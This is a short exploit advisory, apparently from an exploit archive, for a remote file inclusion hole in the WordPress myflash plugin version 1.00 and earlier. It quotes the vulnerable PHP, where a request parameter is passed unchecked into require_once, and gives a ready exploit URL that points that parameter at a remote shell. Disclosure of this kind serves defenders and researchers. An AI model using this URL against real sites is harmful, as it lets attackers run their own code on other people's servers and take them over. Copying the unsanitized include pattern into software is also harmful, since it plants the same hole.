--------------------------------- [ Oyle Kahpe Ki Dünya ! ] --------------------------------------
Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability
#Author: Crackers_Child
#cont@ct: [email protected]
Application : Wordpress plugin
Web Site : http://alexrabe.boelinger.com/
Vuln İn myflash-button.php
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];
require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');
Exploit:
http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?
greets:
Every Body
--------------------------------- [http://www.biyosecurity.net ] --------------------------------------